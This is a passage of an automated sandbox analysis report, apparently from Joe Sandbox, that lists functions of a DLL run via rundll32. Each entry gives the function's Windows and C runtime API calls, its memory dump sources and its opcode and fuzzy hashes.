                                                                                                                    Function 10032A89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 10032AB8
                                                                                                                    • __calloc_crt.LIBCMT ref: 10032AC4
                                                                                                                    • CreateThread.KERNEL32(00000002,?,V&',00000000,?,1001623D), ref: 10032B08
                                                                                                                    • GetLastError.KERNEL32(?,1001623D,?,?,100160A8,?,00000002,00000030,?,00000000), ref: 10032B12
                                                                                                                    • __dosmaperr.LIBCMT ref: 10032B2A
                                                                                                                      • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                      • Part of subcall function 10037753: __decode_pointer.LIBCMT ref: 1003775C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd_noexit
                                                                                                                    • String ID: V&'
                                                                                                                    • API String ID: 1067611704-802299783
                                                                                                                    • Opcode ID: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                    • Instruction ID: 55a26fe1f49629ebb029cc0f5307a0876855c5a2f29d8e6ee061ec31c14b4724
                                                                                                                    • Opcode Fuzzy Hash: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                    • Instruction Fuzzy Hash: 28112376505205EFDB02EFA4DC8288FBBE8FF08366F210429F501DA061EB31A910CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10001390 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 10016C9F: _memset.LIBCMT ref: 10016CB6
                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013DA
                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013EC
                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013FE
                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001410
                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001422
                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001446
                                                                                                                    • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001458
                                                                                                                      • Part of subcall function 100136C0: LoadIconA.USER32 ref: 100136D2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ProcessorVirtual$Concurrency::RootRoot::$IconLoad_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2004563703-0
                                                                                                                    • Opcode ID: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
                                                                                                                    • Instruction ID: cb42d3b07606be4c321c66a21cc03232491b7df8b22d3b1298026f5f2f4788d5
                                                                                                                    • Opcode Fuzzy Hash: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
                                                                                                                    • Instruction Fuzzy Hash: 1A216DB4904299EBDB04CBA8C951BAEBB75FF05704F148558E4516B3C2CB79AA00CB65
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10017632 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10017660
                                                                                                                    • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10017683
                                                                                                                    • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001769F
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 100176AF
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 100176B9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreate$Open
                                                                                                                    • String ID: software
                                                                                                                    • API String ID: 1740278721-2010147023
                                                                                                                    • Opcode ID: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                    • Instruction ID: 0cbbb75e8a23424455f11a5bf93a60ebfd6ed3f7897ef2d174d7de764d8d358b
                                                                                                                    • Opcode Fuzzy Hash: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                    • Instruction Fuzzy Hash: E911C576900169FBDB21DB9ACD88CDFBFBCEF8A740B1040AAE504E2121D3719A55DB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10001180 Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ~_Task_impl.LIBCPMT ref: 100011B6
                                                                                                                      • Part of subcall function 10018A6F: __EH_prolog3.LIBCMT ref: 10018A76
                                                                                                                    • ~_Task_impl.LIBCPMT ref: 100011C8
                                                                                                                    • ~_Task_impl.LIBCPMT ref: 100011EC
                                                                                                                      • Part of subcall function 10018AC4: __EH_prolog3.LIBCMT ref: 10018ACB
                                                                                                                    • ~_Task_impl.LIBCPMT ref: 100011FE
                                                                                                                    • ~_Task_impl.LIBCPMT ref: 10001210
                                                                                                                    • ~_Task_impl.LIBCPMT ref: 10001222
                                                                                                                    • ~_Task_impl.LIBCPMT ref: 10001231
                                                                                                                      • Part of subcall function 10018662: __EH_prolog3.LIBCMT ref: 10018669
                                                                                                                      • Part of subcall function 10016C14: __EH_prolog3.LIBCMT ref: 10016C1B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Task_impl$H_prolog3
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1204490572-0
                                                                                                                    • Opcode ID: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
                                                                                                                    • Instruction ID: 6e4cb6b4a122521f521244997ac3fe4936e5f385243ec76687bf906466ac38b5
                                                                                                                    • Opcode Fuzzy Hash: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
                                                                                                                    • Instruction Fuzzy Hash: 6B215970905189DBEF09DB98C860BBEBB75EF01308F18469DE0526B3C2CB392B00C716
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10020A8E Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 10020A95
                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 10020A9F
                                                                                                                      • Part of subcall function 10033135: RaiseException.KERNEL32(?,?,?,?), ref: 10033175
                                                                                                                    • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004), ref: 10020AB6
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                      • Part of subcall function 100201BD: __CxxThrowException@8.LIBCMT ref: 100201D1
                                                                                                                    • _memset.LIBCMT ref: 10020AE2
                                                                                                                    • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 356813703-0
                                                                                                                    • Opcode ID: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                    • Instruction ID: 3e12b38782b34356c97e10a87625d487b7a933956f885299f771b8ffc362d3ba
                                                                                                                    • Opcode Fuzzy Hash: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                    • Instruction Fuzzy Hash: 7B117974100305AFE721EF60CD86D2ABBA6EF44314B51C029F8569A622DB30FC60CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10020EEA Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Brush
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2798902688-0
                                                                                                                    • Opcode ID: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                    • Instruction ID: b96cbce945517a62156269669ca61c0ebe7744eb3e98ebe12a1aee9bfd1db884
                                                                                                                    • Opcode Fuzzy Hash: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                    • Instruction Fuzzy Hash: 65F012719407449BD730BF728D49B47BAD5FFC4710F02092EE2418B990E6B6E040DF44
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1002981B Relevance: 9.4, APIs: 6, Instructions: 404COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 10029AAB
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 10029B1D
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 10029D0E
                                                                                                                      • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                      • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                      • Part of subcall function 1002C06F: __EH_prolog3.LIBCMT ref: 1002C079
                                                                                                                      • Part of subcall function 1002C06F: lstrlenA.KERNEL32(?,00000224,10029CDA,?,00000008,00000000,?,000000CC), ref: 1002C098
                                                                                                                      • Part of subcall function 1002C06F: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1002C0A0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Clear$H_prolog3$AllocAllocatorByteCopyDebugException@8HeapStringThrowlstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 63617653-0
                                                                                                                    • Opcode ID: 5e2e0a19dc0039e2f502762359befe2295f094a54db6864ce8f61926c363e3fd
                                                                                                                    • Instruction ID: 8f7f5911e4d3fd52506e0ebb541b856e7b36a578254e0be009e80c36fe1d785e
                                                                                                                    • Opcode Fuzzy Hash: 5e2e0a19dc0039e2f502762359befe2295f094a54db6864ce8f61926c363e3fd
                                                                                                                    • Instruction Fuzzy Hash: 13F16D7890024CEBDF55DFA0E890AFD7BB9EF08384F90405AFC5593191DB74AA88DB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1002D1E9 Relevance: 9.3, APIs: 6, Instructions: 253stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_catch_GS.LIBCMT ref: 1002D1F0
                                                                                                                    • lstrlenA.KERNEL32(00000000,000000FF,00000050,10022221,00000000,00000001,?,?,000000FF,?,?,?), ref: 1002D222
                                                                                                                      • Part of subcall function 10017790: _memcpy_s.LIBCMT ref: 100177A0
                                                                                                                    • _memset.LIBCMT ref: 1002D2F2
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 1002D3D1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4021759052-0
                                                                                                                    • Opcode ID: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                    • Instruction ID: 5c01f4bcc98ccee0a604cdfa5feeb0fdece88e80b40f5b50a3c571396f452454
                                                                                                                    • Opcode Fuzzy Hash: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                    • Instruction Fuzzy Hash: 50A18C35C04249DBCF11EFA4E985AEEBBF0FF04350FA0415AE914AB291D734AE41DB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1002D5D0 Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 1002D5FF
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 1002D650
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 1002D674
                                                                                                                      • Part of subcall function 100200B9: __EH_prolog3.LIBCMT ref: 100200C0
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 1002D6CC
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 1002D6F5
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 1002D724
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocString$H_prolog3_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 842698744-0
                                                                                                                    • Opcode ID: 508acb920ccba7a207f47e88a798d4189b9ed575a01c86aa1581d938c190cd50
                                                                                                                    • Instruction ID: 4ca028c9b4d427f08f2d669533113988f62624cee2fc7606aac8abf48e723189
                                                                                                                    • Opcode Fuzzy Hash: 508acb920ccba7a207f47e88a798d4189b9ed575a01c86aa1581d938c190cd50
                                                                                                                    • Instruction Fuzzy Hash: E9414A34900304CFDB24EFB8D891AADB7B5EF04314F50852EF9659B2A2DB74A854CF55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 100169E1 Relevance: 9.1, APIs: 6, Instructions: 115threadwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 10016936: GetParent.USER32(100010EC), ref: 10016989
                                                                                                                      • Part of subcall function 10016936: GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                      • Part of subcall function 10016936: IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                      • Part of subcall function 10016936: EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 10016A2E
                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 10016A3C
                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 10016A46
                                                                                                                    • SendMessageA.USER32 ref: 10016A5B
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10016AD8
                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 10016B14
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1877664794-0
                                                                                                                    • Opcode ID: f56e269d1f7720d56fa1c58fd8a6d78852bfdb5100da494152acd8aedeab4fb9
                                                                                                                    • Instruction ID: f13ef48dc5fb0c484cec2fa7b3f992f2dc6d3b1b42596072abe369902371925a
                                                                                                                    • Opcode Fuzzy Hash: f56e269d1f7720d56fa1c58fd8a6d78852bfdb5100da494152acd8aedeab4fb9
                                                                                                                    • Instruction Fuzzy Hash: 3B415B72A00258DBEB20CFA4CC81BDD76A8EF09350F614119E949AB281E770D9848F52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10016936 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindowLongA.USER32(100010EC,000000F0), ref: 10016968
                                                                                                                    • GetParent.USER32(100010EC), ref: 10016976
                                                                                                                    • GetParent.USER32(100010EC), ref: 10016989
                                                                                                                    • GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                    • IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                    • EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 670545878-0
                                                                                                                    • Opcode ID: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                    • Instruction ID: 154aafdfd528b469a8bf80fc48512ff59873e22bfc4d6b8fcadc8b05587993e6
                                                                                                                    • Opcode Fuzzy Hash: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                    • Instruction Fuzzy Hash: D111A57260133697D661DB698E80B1BB6ECDF9EAE1F120115ED00EF254EB70DC808696
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10020559 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 10020568
                                                                                                                    • GetDlgCtrlID.USER32 ref: 1002057C
                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 1002058A
                                                                                                                    • GetWindowRect.USER32 ref: 1002059C
                                                                                                                    • PtInRect.USER32(?,?,?), ref: 100205AC
                                                                                                                    • GetWindow.USER32(?,00000005), ref: 100205B9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1315500227-0
                                                                                                                    • Opcode ID: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                    • Instruction ID: 9197e044a219b4c4c22350dcb983fe24fb7029e94376554506d026f7e511957d
                                                                                                                    • Opcode Fuzzy Hash: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                    • Instruction Fuzzy Hash: 3B01A235501739EBEB11DF549C48E9F3BADEF4A791F404011FD10D2061E730DA018B99
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1001D992 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
